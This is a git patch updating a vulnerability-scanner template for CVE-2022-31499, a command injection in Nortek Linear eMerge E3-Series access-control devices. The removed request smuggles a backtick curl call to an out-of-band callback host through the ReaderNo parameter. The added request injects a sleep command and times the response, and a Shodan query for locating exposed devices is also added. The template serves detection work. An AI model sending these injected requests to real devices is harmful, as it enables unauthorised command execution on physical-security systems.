From dc99430f95b1f0d6a4445ff4887ae3587cbd731b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 10 Feb 2023 15:13:10 +0530 Subject: [PATCH] template updated --- cves/2022/CVE-2022-31499.yaml | 26 +++++++++++++++++--------- 1 file changed, 17 insertions(+), 9 deletions(-) diff --git a/cves/2022/CVE-2022-31499.yaml b/cves/2022/CVE-2022-31499.yaml index 02f934bbad..7d177dd2d0 100644 --- a/cves/2022/CVE-2022-31499.yaml +++ b/cves/2022/CVE-2022-31499.yaml @@ -1,26 +1,34 @@ id: CVE-2022-31499 info: - name: eMerge E3-Series Command Injection + name: eMerge E3-Series - Command Injection author: pikpikcu severity: critical - description: Nortek Linear eMerge E3-Series version 0.32-09c suffers from a blind OS command injection vulnerability. + description: | + Nortek Linear eMerge E3-Series devices before 0.32-08f allow an unauthenticated attacker to inject OS commands via ReaderNo. NOTE: this issue exists because of an incomplete fix for CVE-2019-7256 . reference: - https://packetstormsecurity.com/files/167991/Nortek-Linear-eMerge-E3-Series-Command-Injection.html - https://github.com/omarhashem123/CVE-2022-31499 - https://nvd.nist.gov/vuln/detail/CVE-2022-31499 + classification: + cve-id: CVE-2022-31499 + metadata: + verified: true + shodan-query: title:"eMerge" tags: cve,cve2022,emerge,rce requests: - raw: - | - GET /card_scan.php?No=1337&ReaderNo=`curl%20{{interactsh-url}}`&CardFormatNo=1337 HTTP/1.1 + @timeout: 15s + GET /card_scan.php?No=123&ReaderNo=`sleep%207`&CardFormatNo=123 HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - - "dns" + - type: dsl + dsl: + - duration>=7 + - contains(all_headers, "text/html") + - status_code == 200 + - contains(body, '{\"CardNo\":false') + condition: and